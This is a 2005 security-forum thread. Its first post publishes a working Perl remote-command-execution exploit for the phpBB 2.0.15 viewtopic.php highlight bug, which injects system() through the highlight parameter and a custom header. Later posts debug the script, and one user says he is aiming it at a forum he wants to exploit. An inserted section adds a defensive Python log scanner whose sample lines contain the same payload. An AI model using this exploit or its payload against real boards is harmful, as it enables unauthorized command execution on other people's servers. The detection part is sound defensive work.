IT Security and Insecurity Portal

phpBB 2.0.15 -re-bug in viewtopic.php

Posted: Thu Jun 30, 2005 8:42 am
zain | Beginner | Joined: Apr 18, 2005 | Posts: 3

New exploit for previously discovered highlight bug...

Code:
#!/usr/bin/perl
 # Wed Jun 29 19:08:04 CEST 2005 dab@digitalsec.net
 #
 # phpBB 2.0.15 -re-bug in viewtopic.php
 
 
 # The complete Open Source Development with CVS: GNU General Public License
 # Book on using CVS effectively <--------- cvs, is also GPL
 # or http://www.google.es/search?q=programming+howto
 #
 # BLINK! BLINK! BLINK! *** BRUTEFORCE CAPABILITIES *** BLINK! BLINK! BLINK!
 #
 #
 # Example: ./phpbb2_0_15.pl http://www.server.com/viewtopic.php?t=1
 # You can start typing commands.
 # Tested in BSD. Theo.. it works!
 #
 # !dSR: let all the hackers say ME!!
 #
 #
 
 
 use strict;
 use IO::Socket;
 
 unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
 
 $ARGV[0] =~ m!http://(.*?)/(.*?t=\d+)!;
 my ($server, $port) = split (/:/,$1);
 $port = 80 unless defined($port);
 $server = $1 unless defined($server);
 my ($url, $command) = $2;
 
 print "$server - $port - $url\n";
 
 while () {
 print "phpBB2.0.15> ";
 while(<STDIN>) {
 $command=$_;
 chomp($command);
 last;
 }
 &send($command);
 }
 
 sub send {
 my $ok = 0;
 my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
 my $string = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
 "Host: $server\nPHP: $cmd\n\n\n\n";
 my $socket = IO::Socket::INET->new(PeerAddr => $server,
 PeerPort => $port,
 Proto => "tcp",
 Type => SOCK_STREAM)
 or die "can't connect to: $server : $@\n";
 print $socket $string;
 while(<$socket>) {
 if (/#PHPBBEXPLOIT#/) {
 close($socket) and last if $ok eq 2;
 $ok++;
 next;
 }
 print if $ok eq "1";
 }
 }
 exit 0;
 
 Can anyone get this to work? I ran it, and it gives me a phpBB2.0.15> prompt, but no matter what command I try it returns nothing.
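
For anyone defending a board: the request built by the script above has a recognisable shape, a `viewtopic.php` query whose `highlight` value contains quote characters and PHP call syntax instead of search words. The following is an added example, not part of the original post: a Python filter that flags such requests in access logs. The log lines are constructed samples, and the two heuristics in `CHECKS` are assumptions to tune for a given site.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [30/Jun/2005:08:40:01 +0000] "GET /forum/viewtopic.php?t=1&highlight=perl HTTP/1.1" 200 18234
192.0.2.77 - - [30/Jun/2005:08:42:13 +0000] "GET /forum/viewtopic.php?t=1&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1" 200 20111
192.0.2.77 - - [30/Jun/2005:08:42:40 +0000] "GET /forum/viewtopic.php?t=1&highlight=%27.system(getenv(HTTP_PHP)).%27 HTTP/1.1" 200 20111
192.0.2.11 - - [30/Jun/2005:08:45:00 +0000] "GET /forum/viewtopic.php?t=7&highlight=system+requirements HTTP/1.1" 200 17002
""".splitlines()

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*"')

# Assumed heuristics: a genuine highlight value is a list of search words,
# so quoting characters or call syntax in it are worth an alert.
CHECKS = {
    "quote or backslash": re.compile(r"['\"\\]"),
    "function-call syntax": re.compile(r"[A-Za-z_]\w*\s*\("),
}

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so nested encoding cannot hide markers."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (client_ip, decoded_highlight, reasons) for suspicious viewtopic hits."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        url = urlsplit(m.group("target")) if m else None
        if url is None or not url.path.endswith("viewtopic.php"):
            continue
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key != "highlight":
                continue
            value = fully_decode(value)
            reasons = [name for name, rx in CHECKS.items() if rx.search(value)]
            if reasons:
                hits.append((m.group("ip"), value, reasons))
    return hits

if __name__ == "__main__":
    for ip, value, reasons in scan(SAMPLE_LOG):
        print(f"{ip}  highlight={value!r}  -> {', '.join(reasons)}")
```

The command itself travels in the `PHP:` request header, which default access logs do not record; Apache can capture it by adding `%{PHP}i` to the `LogFormat`.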

Posted: Thu Jun 30, 2005 8:48 am
shai-tan | Valuable expert | Joined: Feb 22, 2005 | Posts: 477

Are you using BSD?
It says:

Quote:
# Tested in BSD. Theo.. it works!

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds

Posted: Thu Jun 30, 2005 1:17 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

Quote:
Can anyone get this to work? I ran it, and it gives me a phpBB2.0.15> prompt, but no matter what command I try it returns nothing.

 Same here :/

Posted: Thu Jun 30, 2005 1:21 pm
subzero | Valuable expert | Joined: Mar 16, 2005 | Posts: 42

C'mon shaitan.. it's just a little fix.. needed
try to delete # in \#PHPBBEXPLOIT#\ and /#PHPBBEXPLOIT#/ see what u get

Posted: Thu Jun 30, 2005 1:40 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

emmm i get

Code:
 Bareword found where operator expected at ./test line 48, near ""echo /"PHPBBEXPLOIT"
 (Missing operator before PHPBBEXPLOIT?)
 Bareword found where operator expected at ./test line 48, near "";echo /"PHPBBEXPLOIT"
 (Missing operator before PHPBBEXPLOIT?)
 syntax error at ./test line 48, near ""echo /"PHPBBEXPLOIT"
 Execution of ./test aborted due to compilation errors.
 
 

Posted: Thu Jun 30, 2005 1:49 pm
subzero | Valuable expert | Joined: Mar 16, 2005 | Posts: 42

Code:
my $cmd = "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";

to

Code:
my $cmd = "echo \"PHPBBEXPLOIT\";".$_[0].";echo \"PHPBBEXPLOIT\"";

and

Code:
if (/#PHPBBEXPLOIT#/) {

to

Code:
if (/PHPBBEXPLOIT/) {
 
 

Posted: Thu Jun 30, 2005 1:53 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

it's like the same before fixes

Code:
user@site:~$ ./test http://site.com/forum/viewtopic.php?t=1
site.com - 80 - forum/viewtopic.php?t=1
phpBB2.0.15>
 
 And stuck :/

Posted: Thu Jun 30, 2005 1:56 pm
subzero | Valuable expert | Joined: Mar 16, 2005 | Posts: 42

Posted: Thu Jun 30, 2005 2:01 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

no just have changed the url some forum that i wanna try to exploit

Posted: Thu Jun 30, 2005 5:24 pm
shai-tan | Valuable expert | Joined: Feb 22, 2005 | Posts: 477

I don't actually like Perl..... PHP is my replacement and I'm still learning my C and C++ so CGIs aren't all that popular with me yet. But Perl will never happen for me.

Posted: Thu Jun 30, 2005 5:57 pm
diaga | Regular user | Joined: Jun 27, 2005 | Posts: 22

Posted: Fri Jul 01, 2005 1:55 am
LINUX | Moderator | Joined: May 24, 2004 | Posts: 404 | Location: Caiman

this code original in perl work for 2.0.14 and 2.0.15 work nice
not work: if server have disable functions > exec,system,passthru,shell_exec or safe mode enabled
All times are GMT
 